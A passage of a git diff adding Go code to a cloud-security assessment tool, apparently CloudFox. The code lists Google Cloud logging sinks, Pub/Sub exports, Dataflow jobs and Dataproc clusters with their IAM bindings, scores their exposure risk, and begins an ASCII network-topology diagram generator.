{ + // Continue with other projects + continue + } + } + + return crossProjectSinks, nil +} + +// parseLoggingDestination parses a logging sink destination to extract type and project +func parseLoggingDestination(destination string) (destType, projectID string) { + // Destination formats: + // storage.googleapis.com/BUCKET_NAME + // bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID + // pubsub.googleapis.com/projects/PROJECT_ID/topics/TOPIC_ID + // logging.googleapis.com/projects/PROJECT_ID/locations/LOCATION/buckets/BUCKET_ID + + if strings.HasPrefix(destination, "storage.googleapis.com/") { + // GCS bucket - need to look up bucket to get project (not easily extractable) + return "storage", "" + } + + if strings.HasPrefix(destination, "bigquery.googleapis.com/") { + destType = "bigquery" + // Format: bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID + parts := strings.Split(destination, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return destType, parts[i+1] + } + } + } + + if strings.HasPrefix(destination, "pubsub.googleapis.com/") { + destType = "pubsub" + // Format: pubsub.googleapis.com/projects/PROJECT_ID/topics/TOPIC_ID + parts := strings.Split(destination, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return destType, parts[i+1] + } + } + } + + if strings.HasPrefix(destination, "logging.googleapis.com/") { + destType = "logging" + // Format: logging.googleapis.com/projects/PROJECT_ID/locations/LOCATION/buckets/BUCKET_ID + parts := strings.Split(destination, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return destType, parts[i+1] + } + } + } + + return "unknown", "" +} + +// analyzeLoggingSinkRisk analyzes the risk level of a cross-project logging sink +func analyzeLoggingSinkRisk(sink *logging.LogSink, targetProject string, knownProjects map[string]bool) (string, []string) { + var reasons []string + score := 0 + + // External project is higher risk + if !knownProjects[targetProject] { + reasons = append(reasons, "Logs exported to project outside analyzed scope") + score += 2 + } + + // Check if filter is broad (empty = all logs) + if sink.Filter == "" { + reasons = append(reasons, "No filter - ALL logs exported") + score += 2 + } + + // Check for sensitive log types in filter + sensitiveLogTypes := []string{"data_access", "admin_activity", "cloudaudit"} + for _, lt := range sensitiveLogTypes { + if strings.Contains(sink.Filter, lt) { + reasons = append(reasons, fmt.Sprintf("Exports sensitive logs: %s", lt)) + score += 1 + } + } + + // Check if sink has service account (writerIdentity) + if sink.WriterIdentity != "" { + reasons = append(reasons, fmt.Sprintf("Service account: %s", sink.WriterIdentity)) + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } + return "LOW", reasons +} + +// FindCrossProjectPubSubExports discovers Pub/Sub subscriptions that export to other projects +func (s *CrossProjectService) FindCrossProjectPubSubExports(projectIDs []string) ([]CrossProjectPubSubExport, error) { + ctx := context.Background() + + pubsubService, err := s.getPubSubService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + + // Build project lookup map + projectMap := make(map[string]bool) + for _, p := range projectIDs { + projectMap[p] = true + } + + var crossProjectExports []CrossProjectPubSubExport + + for _, sourceProject := range projectIDs { + // List all subscriptions in project + parent := fmt.Sprintf("projects/%s", sourceProject) + req := pubsubService.Projects.Subscriptions.List(parent) + err := req.Pages(ctx, func(page *pubsub.ListSubscriptionsResponse) error { + for _, sub := range page.Subscriptions { + // Extract subscription name and topic project + subName := extractResourceNameFromPath(sub.Name) + topicProject := extractProjectFromPath(sub.Topic) + + var exportType, exportDest, targetProject string + + // Check for BigQuery export + if sub.BigqueryConfig != nil && sub.BigqueryConfig.Table != "" { + exportType = "bigquery" + exportDest = sub.BigqueryConfig.Table + // Extract project from table: PROJECT:DATASET.TABLE + if parts := strings.Split(sub.BigqueryConfig.Table, ":"); len(parts) > 0 { + targetProject = parts[0] + } + } + + // Check for Cloud Storage export + if sub.CloudStorageConfig != nil && sub.CloudStorageConfig.Bucket != "" { + exportType = "cloudstorage" + exportDest = sub.CloudStorageConfig.Bucket + // Bucket project not easily extractable without additional API call + targetProject = "" + } + + // Check for push endpoint + if sub.PushConfig != nil && sub.PushConfig.PushEndpoint != "" { + exportType = "push" + exportDest = sub.PushConfig.PushEndpoint + // External push endpoints can't be mapped to a project + targetProject = "external" + } + + // Check if subscription is to a topic in another project + if topicProject != "" && topicProject != sourceProject { + // This is a cross-project topic subscription + riskLevel, riskReasons := analyzePubSubExportRisk(sub, targetProject, projectMap, topicProject, sourceProject) + export := CrossProjectPubSubExport{ + SourceProject: sourceProject, + TopicProject: topicProject, + TopicName: extractResourceNameFromPath(sub.Topic), + SubscriptionName: subName, + ExportType: "cross-project-topic", + ExportDest: sub.Topic, + TargetProject: topicProject, + RiskLevel: riskLevel, + RiskReasons: riskReasons, + } + crossProjectExports = append(crossProjectExports, export) + } + + // If exporting to another project via BQ/GCS + if targetProject != "" && targetProject != sourceProject && targetProject != "external" { + riskLevel, riskReasons := analyzePubSubExportRisk(sub, targetProject, projectMap, topicProject, sourceProject) + export := CrossProjectPubSubExport{ + SourceProject: sourceProject, + TopicProject: topicProject, + TopicName: extractResourceNameFromPath(sub.Topic), + SubscriptionName: subName, + ExportType: exportType, + ExportDest: exportDest, + TargetProject: targetProject, + RiskLevel: riskLevel, + RiskReasons: riskReasons, + } + crossProjectExports = append(crossProjectExports, export) + } + } + return nil + }) + if err != nil { + // Continue with other projects + continue + } + } + + return crossProjectExports, nil +} + +// extractResourceNameFromPath extracts the resource name from a full path +func extractResourceNameFromPath(path string) string { + parts := strings.Split(path, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return path +} + +// extractProjectFromPath extracts the project ID from a resource path +func extractProjectFromPath(path string) string { + // Format: projects/PROJECT_ID/... + parts := strings.Split(path, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} + +// analyzePubSubExportRisk analyzes the risk level of a cross-project Pub/Sub export +func analyzePubSubExportRisk(sub *pubsub.Subscription, targetProject string, knownProjects map[string]bool, topicProject, sourceProject string) (string, []string) { + var reasons []string + score := 0 + + // External target project is higher risk + if targetProject != "" && !knownProjects[targetProject] { + reasons = append(reasons, "Data exported to project outside analyzed scope") + score += 2 + } + + // Cross-project topic subscription + if topicProject != "" && topicProject != sourceProject { + reasons = append(reasons, fmt.Sprintf("Subscription to topic in project %s", topicProject)) + score += 1 + } + + // Push to external endpoint + if sub.PushConfig != nil && sub.PushConfig.PushEndpoint != "" { + endpoint := sub.PushConfig.PushEndpoint + reasons = append(reasons, fmt.Sprintf("Push endpoint: %s", endpoint)) + // External endpoints are high risk + if !strings.Contains(endpoint, ".run.app") && !strings.Contains(endpoint, ".cloudfunctions.net") { + reasons = append(reasons, "Push to external (non-GCP) endpoint") + score += 2 + } + } + + // BigQuery export + if sub.BigqueryConfig != nil { + reasons = append(reasons, fmt.Sprintf("BigQuery export: %s", sub.BigqueryConfig.Table)) + score += 1 + } + + // Cloud Storage export + if sub.CloudStorageConfig != nil { + reasons = append(reasons, fmt.Sprintf("Cloud Storage export: %s", sub.CloudStorageConfig.Bucket)) + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } + return "LOW", reasons +} diff --git a/gcp/services/dataflowService/dataflowService.go b/gcp/services/dataflowService/dataflowService.go new file mode 100644 index 00000000..4d8a0eef --- /dev/null +++ b/gcp/services/dataflowService/dataflowService.go @@ -0,0 +1,176 @@ +package dataflowservice + +import ( + "context" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + dataflow "google.golang.org/api/dataflow/v1b3" +) + +type DataflowService struct { + session *gcpinternal.SafeSession +} + +func New() *DataflowService { + return &DataflowService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *DataflowService { + return &DataflowService{session: session} +} + +// getService returns a Dataflow service client using cached session if available +func (s *DataflowService) getService(ctx context.Context) (*dataflow.Service, error) { + if s.session != nil { + return sdk.CachedGetDataflowService(ctx, s.session) + } + return dataflow.NewService(ctx) +} + +// JobInfo represents a Dataflow job +type JobInfo struct { + ID string `json:"id"` + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + Type string `json:"type"` // JOB_TYPE_BATCH or JOB_TYPE_STREAMING + State string `json:"state"` // JOB_STATE_RUNNING, etc. + CreateTime string `json:"createTime"` + CurrentStateTime string `json:"currentStateTime"` + ServiceAccount string `json:"serviceAccount"` + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + TempLocation string `json:"tempLocation"` // GCS temp location + StagingLocation string `json:"stagingLocation"` // GCS staging location + WorkerRegion string `json:"workerRegion"` + WorkerZone string `json:"workerZone"` + NumWorkers int64 `json:"numWorkers"` + MachineType string `json:"machineType"` + UsePublicIPs bool `json:"usePublicIps"` + EnableStreamingEngine bool `json:"enableStreamingEngine"` + // Security analysis + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// TemplateInfo represents a Dataflow template +type TemplateInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Description string `json:"description"` + // Template metadata +} + +// ListJobs retrieves all Dataflow jobs in a project +func (s *DataflowService) ListJobs(projectID string) ([]JobInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dataflow.googleapis.com") + } + + var jobs []JobInfo + + // List jobs across all locations + req := service.Projects.Jobs.Aggregated(projectID) + err = req.Pages(ctx, func(page *dataflow.ListJobsResponse) error { + for _, job := range page.Jobs { + info := s.parseJob(job, projectID) + jobs = append(jobs, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dataflow.googleapis.com") + } + + return jobs, nil +} + +// parseJob converts a Dataflow job to JobInfo +func (s *DataflowService) parseJob(job *dataflow.Job, projectID string) JobInfo { + info := JobInfo{ + ID: job.Id, + Name: job.Name, + ProjectID: projectID, + Location: job.Location, + Type: job.Type, + State: job.CurrentState, + CreateTime: job.CreateTime, + CurrentStateTime: job.CurrentStateTime, + RiskReasons: []string{}, + } + + // Parse environment settings + if job.Environment != nil { + info.ServiceAccount = job.Environment.ServiceAccountEmail + info.TempLocation = job.Environment.TempStoragePrefix + info.WorkerRegion = job.Environment.WorkerRegion + info.WorkerZone = job.Environment.WorkerZone + + // Check worker pools for network config + if len(job.Environment.WorkerPools) > 0 { + wp := job.Environment.WorkerPools[0] + info.Network = wp.Network + info.Subnetwork = wp.Subnetwork + info.NumWorkers = wp.NumWorkers + info.MachineType = wp.MachineType + + // Check for public IPs - default is true if not specified + if wp.IpConfiguration == "WORKER_IP_PRIVATE" { + info.UsePublicIPs = false + } else { + info.UsePublicIPs = true + } + } + } + + // Security analysis + info.RiskLevel, info.RiskReasons = s.analyzeJobRisk(info) + + return info +} + +// analyzeJobRisk determines the risk level of a Dataflow job +func (s *DataflowService) analyzeJobRisk(job JobInfo) (string, []string) { + var reasons []string + score := 0 + + // Public IPs increase exposure + if job.UsePublicIPs { + reasons = append(reasons, "Workers use public IP addresses") + score += 2 + } + + // Default service account is often over-privileged + if job.ServiceAccount == "" || strings.Contains(job.ServiceAccount, "compute@developer.gserviceaccount.com") { + reasons = append(reasons, "Uses default Compute Engine service account") + score += 2 + } + + // Check for external temp/staging locations + if job.TempLocation != "" && !strings.Contains(job.TempLocation, job.ProjectID) { + reasons = append(reasons, "Temp location may be in external project") + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/dataprocService/dataprocService.go b/gcp/services/dataprocService/dataprocService.go new file mode 100644 index 00000000..3500782b --- /dev/null +++ b/gcp/services/dataprocService/dataprocService.go @@ -0,0 +1,295 @@ +package dataprocservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" + dataproc "google.golang.org/api/dataproc/v1" +) + +type DataprocService struct { + session *gcpinternal.SafeSession +} + +func New() *DataprocService { + return &DataprocService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *DataprocService { + return &DataprocService{session: session} +} + +// getService returns a Dataproc service client using cached session if available +func (s *DataprocService) getService(ctx context.Context) (*dataproc.Service, error) { + if s.session != nil { + return sdk.CachedGetDataprocService(ctx, s.session) + } + return dataproc.NewService(ctx) +} + +// ClusterInfo represents a Dataproc cluster +type ClusterInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + State string `json:"state"` + StateStartTime string `json:"stateStartTime"` + ClusterUUID string `json:"clusterUuid"` + + // Config + ConfigBucket string `json:"configBucket"` + TempBucket string `json:"tempBucket"` + ImageVersion string `json:"imageVersion"` + ServiceAccount string `json:"serviceAccount"` + + // Master config + MasterMachineType string `json:"masterMachineType"` + MasterCount int64 `json:"masterCount"` + MasterDiskSizeGB int64 `json:"masterDiskSizeGb"` + MasterInstanceNames []string `json:"masterInstanceNames"` + + // Worker config + WorkerMachineType string `json:"workerMachineType"` + WorkerCount int64 `json:"workerCount"` + WorkerDiskSizeGB int64 `json:"workerDiskSizeGb"` + + // Network config + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + InternalIPOnly bool `json:"internalIpOnly"` + Zone string `json:"zone"` + + // Security config + KerberosEnabled bool `json:"kerberosEnabled"` + SecureBoot bool `json:"secureBoot"` + + // IAM bindings + IAMBindings []IAMBinding `json:"iamBindings"` +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// JobInfo represents a Dataproc job +type JobInfo struct { + JobID string `json:"jobId"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + ClusterName string `json:"clusterName"` + Status string `json:"status"` + JobType string `json:"jobType"` + SubmittedBy string `json:"submittedBy"` + StartTime string `json:"startTime"` + EndTime string `json:"endTime"` +} + +// ListClusters retrieves all Dataproc clusters +func (s *DataprocService) ListClusters(projectID string) ([]ClusterInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dataproc.googleapis.com") + } + + var clusters []ClusterInfo + + // Get regions from regionService (with automatic fallback) + regions := regionservice.GetCachedRegionNames(ctx, projectID) + + // List across all regions + for _, region := range regions { + regionClusters, err := service.Projects.Regions.Clusters.List(projectID, region).Context(ctx).Do() + if err != nil { + continue // Skip regions with errors (API not enabled, no permissions, etc.) + } + + for _, cluster := range regionClusters.Clusters { + info := s.parseCluster(cluster, projectID, region, service, ctx) + clusters = append(clusters, info) + } + } + + return clusters, nil +} + +// ListJobs retrieves recent Dataproc jobs +func (s *DataprocService) ListJobs(projectID, region string) ([]JobInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dataproc.googleapis.com") + } + + var jobs []JobInfo + + resp, err := service.Projects.Regions.Jobs.List(projectID, region).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dataproc.googleapis.com") + } + + for _, job := range resp.Jobs { + info := s.parseJob(job, projectID, region) + jobs = append(jobs, info) + } + + return jobs, nil +} + +func (s *DataprocService) parseCluster(cluster *dataproc.Cluster, projectID, region string, service *dataproc.Service, ctx context.Context) ClusterInfo { + info := ClusterInfo{ + Name: cluster.ClusterName, + ProjectID: projectID, + Region: region, + ClusterUUID: cluster.ClusterUuid, + IAMBindings: []IAMBinding{}, + } + + if cluster.Status != nil { + info.State = cluster.Status.State + info.StateStartTime = cluster.Status.StateStartTime + } + + if cluster.Config != nil { + info.ConfigBucket = cluster.Config.ConfigBucket + info.TempBucket = cluster.Config.TempBucket + + // Software config + if cluster.Config.SoftwareConfig != nil { + info.ImageVersion = cluster.Config.SoftwareConfig.ImageVersion + } + + // GCE cluster config + if cluster.Config.GceClusterConfig != nil { + gcc := cluster.Config.GceClusterConfig + info.ServiceAccount = gcc.ServiceAccount + info.Network = extractName(gcc.NetworkUri) + info.Subnetwork = extractName(gcc.SubnetworkUri) + info.InternalIPOnly = gcc.InternalIpOnly + info.Zone = extractName(gcc.ZoneUri) + + if gcc.ShieldedInstanceConfig != nil { + info.SecureBoot = gcc.ShieldedInstanceConfig.EnableSecureBoot + } + } + + // Master config + if cluster.Config.MasterConfig != nil { + mc := cluster.Config.MasterConfig + info.MasterMachineType = extractName(mc.MachineTypeUri) + info.MasterCount = mc.NumInstances + info.MasterInstanceNames = mc.InstanceNames + if mc.DiskConfig != nil { + info.MasterDiskSizeGB = mc.DiskConfig.BootDiskSizeGb + } + } + + // Worker config + if cluster.Config.WorkerConfig != nil { + wc := cluster.Config.WorkerConfig + info.WorkerMachineType = extractName(wc.MachineTypeUri) + info.WorkerCount = wc.NumInstances + if wc.DiskConfig != nil { + info.WorkerDiskSizeGB = wc.DiskConfig.BootDiskSizeGb + } + } + + // Security config + if cluster.Config.SecurityConfig != nil && cluster.Config.SecurityConfig.KerberosConfig != nil { + info.KerberosEnabled = true + } + } + + // Get IAM policy for the cluster + info.IAMBindings = s.getClusterIAMBindings(service, ctx, projectID, region, cluster.ClusterName) + + return info +} + +func (s *DataprocService) parseJob(job *dataproc.Job, projectID, region string) JobInfo { + info := JobInfo{ + JobID: job.Reference.JobId, + ProjectID: projectID, + Region: region, + ClusterName: job.Placement.ClusterName, + } + + if job.Status != nil { + info.Status = job.Status.State + info.StartTime = job.Status.StateStartTime + } + + if job.StatusHistory != nil && len(job.StatusHistory) > 0 { + for _, status := range job.StatusHistory { + if status.State == "DONE" || status.State == "ERROR" || status.State == "CANCELLED" { + info.EndTime = status.StateStartTime + break + } + } + } + + // Determine job type + if job.HadoopJob != nil { + info.JobType = "Hadoop" + } else if job.SparkJob != nil { + info.JobType = "Spark" + } else if job.PysparkJob != nil { + info.JobType = "PySpark" + } else if job.HiveJob != nil { + info.JobType = "Hive" + } else if job.PigJob != nil { + info.JobType = "Pig" + } else if job.SparkRJob != nil { + info.JobType = "SparkR" + } else if job.SparkSqlJob != nil { + info.JobType = "SparkSQL" + } else if job.PrestoJob != nil { + info.JobType = "Presto" + } else { + info.JobType = "Unknown" + } + + return info +} + +// getClusterIAMBindings retrieves IAM bindings for a Dataproc cluster +func (s *DataprocService) getClusterIAMBindings(service *dataproc.Service, ctx context.Context, projectID, region, clusterName string) []IAMBinding { + var bindings []IAMBinding + + resource := fmt.Sprintf("projects/%s/regions/%s/clusters/%s", projectID, region, clusterName) + policy, err := service.Projects.Regions.Clusters.GetIamPolicy(resource, &dataproc.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + // Return empty bindings if we can't get IAM policy + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +func extractName(fullPath string) string { + if fullPath == "" { + return "" + } + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} diff --git a/gcp/services/diagramService/diagramService.go b/gcp/services/diagramService/diagramService.go new file mode 100755 index 00000000..05bdde47 --- /dev/null +++ b/gcp/services/diagramService/diagramService.go @@ -0,0 +1,1405 @@ +package diagramservice + +import ( + "fmt" + "sort" + "strings" +) + +// DiagramConfig holds configuration for diagram generation +type DiagramConfig struct { + Width int // Default outer width + InnerWidth int // Default inner width + ShowLegend bool // Whether to show legend + CompactMode bool // Use compact layout +} + +// DefaultConfig returns sensible defaults for diagram generation +func DefaultConfig() DiagramConfig { + return DiagramConfig{ + Width: 90, + InnerWidth: 84, + ShowLegend: true, + CompactMode: false, + } +} + +// ======================================== +// Core Drawing Primitives +// ======================================== + +// DrawBox draws a simple box with centered title +func DrawBox(title string, width int) string { + var sb strings.Builder + + // Top border + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + + // Title line (centered) + padding := (width - 4 - len(title)) / 2 + if padding < 0 { + padding = 0 + } + sb.WriteString("│ ") + sb.WriteString(strings.Repeat(" ", padding)) + sb.WriteString(title) + sb.WriteString(strings.Repeat(" ", width-4-padding-len(title))) + sb.WriteString(" │\n") + + // Bottom border + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// DrawBoxWithContent draws a box with title and content lines +func DrawBoxWithContent(title string, content []string, width int) string { + var sb strings.Builder + + // Top border + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + + // Title line + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, title)) + + // Separator + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + // Content lines + for _, line := range content { + if len(line) > width-4 { + line = line[:width-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, line)) + } + + // Bottom border + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// DrawSectionHeader draws a section header box +func DrawSectionHeader(title string, width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, title)) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + return sb.String() +} + +// DrawSectionFooter draws a section footer +func DrawSectionFooter(width int) string { + var sb strings.Builder + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + return sb.String() +} + +// DrawNestedBox draws a box nested inside another (with indentation) +func DrawNestedBox(title string, content []string, outerWidth, indent int) string { + var sb strings.Builder + innerWidth := outerWidth - (indent * 2) - 4 + + // Padding prefix + pad := strings.Repeat(" ", indent) + + // Top border + sb.WriteString(fmt.Sprintf("│%s┌%s┐%s│\n", pad, strings.Repeat("─", innerWidth-2), pad)) + + // Title + titleLine := title + if len(titleLine) > innerWidth-4 { + titleLine = titleLine[:innerWidth-7] + "..." + } + sb.WriteString(fmt.Sprintf("│%s│ %-*s │%s│\n", pad, innerWidth-4, titleLine, pad)) + + // Separator if content exists + if len(content) > 0 { + sb.WriteString(fmt.Sprintf("│%s├%s┤%s│\n", pad, strings.Repeat("─", innerWidth-2), pad)) + + for _, line := range content { + if len(line) > innerWidth-4 { + line = line[:innerWidth-7] + "..." + } + sb.WriteString(fmt.Sprintf("│%s│ %-*s │%s│\n", pad, innerWidth-4, line, pad)) + } + } + + // Bottom border + sb.WriteString(fmt.Sprintf("│%s└%s┘%s│\n", pad, strings.Repeat("─", innerWidth-2), pad)) + + return sb.String() +} + +// DrawEmptyLine draws an empty content line +func DrawEmptyLine(width int) string { + return fmt.Sprintf("│%s│\n", strings.Repeat(" ", width-2)) +} + +// DrawTextLine draws a text line inside a box +func DrawTextLine(text string, width int) string { + if len(text) > width-4 { + text = text[:width-7] + "..." + } + return fmt.Sprintf("│ %-*s │\n", width-4, text) +} + +// ======================================== +// Network Diagram Components +// ======================================== + +// NetworkInfo represents a VPC network for diagram purposes +type NetworkInfo struct { + Name string + ProjectID string + RoutingMode string + MTU int64 + IsSharedVPC bool + SharedVPCRole string + PeeringCount int +} + +// SubnetInfo represents a subnet for diagram purposes +type SubnetInfo struct { + Name string + Region string + IPCIDRRange string + PrivateIPGoogleAccess bool + FlowLogsEnabled bool +} + +// CloudNATInfo represents Cloud NAT for diagram purposes +type CloudNATInfo struct { + Name string + Region string + Network string + NATIPAddresses []string +} + +// FirewallRuleInfo represents a firewall rule for diagram purposes +type FirewallRuleInfo struct { + Name string + Direction string + Priority int64 + SourceRanges []string + AllowedPorts string + TargetTags string + IsPublicIngress bool + Disabled bool +} + +// LoadBalancerInfo represents a load balancer for diagram purposes +type LoadBalancerInfo struct { + Name string + Type string + Scheme string + IPAddress string + Port string + Region string + BackendServices []string + SecurityPolicy string + // BackendDetails maps backend service name to its actual backends (instance groups, NEGs, etc.) + BackendDetails map[string][]string +} + +// VPCPeeringInfo represents VPC peering for diagram purposes +type VPCPeeringInfo struct { + Name string + Network string + PeerNetwork string + PeerProjectID string + State string + ExportRoutes bool + ImportRoutes bool +} + +// SharedVPCConfig represents shared VPC configuration +type SharedVPCConfig struct { + HostProject string + ServiceProjects []string + Networks []string +} + +// ======================================== +// Network Topology Diagram Functions +// ======================================== + +// DrawNetworkTopologyDiagram generates a complete network topology ASCII diagram +func DrawNetworkTopologyDiagram( + networksByProject map[string][]NetworkInfo, + subnetsByNetwork map[string][]SubnetInfo, // key: "projectID/networkName" + natsByNetwork map[string][]CloudNATInfo, // key: "projectID/networkName" + peeringMap map[string][]VPCPeeringInfo, // key: "projectID/networkName" + sharedVPCs map[string]SharedVPCConfig, // key: hostProjectID + projectNames map[string]string, // projectID -> displayName +) string { + var sb strings.Builder + width := 90 + + // Header + sb.WriteString(DrawBox("GCP NETWORK TOPOLOGY", width)) + sb.WriteString("\n") + + // Sort projects for consistent output + var projectIDs []string + for projectID := range networksByProject { + projectIDs = append(projectIDs, projectID) + } + sort.Strings(projectIDs) + + // Draw each project + for _, projectID := range projectIDs { + networks := networksByProject[projectID] + displayName := projectNames[projectID] + sb.WriteString(drawProjectNetworks(projectID, displayName, networks, subnetsByNetwork, natsByNetwork, peeringMap, width)) + sb.WriteString("\n") + } + + // Draw Shared VPC relationships if any + if len(sharedVPCs) > 0 { + sb.WriteString(drawSharedVPCRelationships(sharedVPCs, width)) + sb.WriteString("\n") + } + + // Draw VPC Peering summary + allPeerings := collectAllPeerings(peeringMap) + if len(allPeerings) > 0 { + sb.WriteString(drawPeeringSummary(allPeerings, width)) + sb.WriteString("\n") + } + + // Legend + sb.WriteString(DrawNetworkLegend(width)) + + return sb.String() +} + +func drawProjectNetworks( + projectID, displayName string, + networks []NetworkInfo, + subnetsByNetwork map[string][]SubnetInfo, + natsByNetwork map[string][]CloudNATInfo, + peeringMap map[string][]VPCPeeringInfo, + width int, +) string { + var sb strings.Builder + + projectTitle := fmt.Sprintf("PROJECT: %s", projectID) + if displayName != "" && displayName != projectID { + projectTitle = fmt.Sprintf("PROJECT: %s (%s)", projectID, displayName) + } + + // Project header + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, projectTitle)) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + // Sort networks + sort.Slice(networks, func(i, j int) bool { + return networks[i].Name < networks[j].Name + }) + + // Draw each VPC network + for _, network := range networks { + sb.WriteString(drawVPCNetwork(network, subnetsByNetwork, natsByNetwork, peeringMap, width)) + } + + // Project footer + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +func drawVPCNetwork( + network NetworkInfo, + subnetsByNetwork map[string][]SubnetInfo, + natsByNetwork map[string][]CloudNATInfo, + peeringMap map[string][]VPCPeeringInfo, + outerWidth int, +) string { + var sb strings.Builder + innerWidth := outerWidth - 6 + + // VPC header with attributes + vpcTitle := fmt.Sprintf("VPC: %s", network.Name) + vpcAttrs := fmt.Sprintf("(%s routing, MTU: %d)", network.RoutingMode, network.MTU) + + // Add Shared VPC indicator + sharedVPCLabel := "" + if network.IsSharedVPC { + sharedVPCLabel = fmt.Sprintf(" [SHARED VPC %s]", strings.ToUpper(network.SharedVPCRole)) + } + + // Peering indicator + peeringLabel := "" + if network.PeeringCount > 0 { + peeringLabel = fmt.Sprintf(" [%d PEERING(s)]", network.PeeringCount) + } + + sb.WriteString(DrawEmptyLine(outerWidth)) + sb.WriteString("│ ┌") + sb.WriteString(strings.Repeat("─", innerWidth-2)) + sb.WriteString("┐ │\n") + + // VPC title line + titleLine := fmt.Sprintf("%s %s%s%s", vpcTitle, vpcAttrs, sharedVPCLabel, peeringLabel) + if len(titleLine) > innerWidth-4 { + titleLine = titleLine[:innerWidth-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ │ %-*s │ │\n", innerWidth-4, titleLine)) + + sb.WriteString("│ ├") + sb.WriteString(strings.Repeat("─", innerWidth-2)) + sb.WriteString("┤ │\n") + + // Get subnets for this network + key := network.ProjectID + "/" + network.Name + subnets := subnetsByNetwork[key] + + // Group subnets by region + subnetsByRegion := make(map[string][]SubnetInfo) + for _, s := range subnets { + subnetsByRegion[s.Region] = append(subnetsByRegion[s.Region], s) + } + + // Sort regions + var regions []string + for region := range subnetsByRegion { + regions = append(regions, region) + } + sort.Strings(regions) + + if len(subnets) == 0 { + sb.WriteString(fmt.Sprintf("│ │ %-*s │ │\n", innerWidth-4, "(No subnets)")) + } else { + // Draw subnets in a grid layout (3 per row) + subnetWidth := 26 + subnetsPerRow := 3 + + for i := 0; i < len(regions); i += subnetsPerRow { + endIdx := i + subnetsPerRow + if endIdx > len(regions) { + endIdx = len(regions) + } + rowRegions := regions[i:endIdx] + + // Top of subnet boxes + sb.WriteString("│ │ ") + for j := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", subnetWidth-2)) + sb.WriteString("┐") + } + remaining := innerWidth - 4 - (len(rowRegions) * subnetWidth) - ((len(rowRegions) - 1) * 2) + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // Region name line + sb.WriteString("│ │ ") + for j, region := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + regionDisplay := region + if len(regionDisplay) > subnetWidth-4 { + regionDisplay = 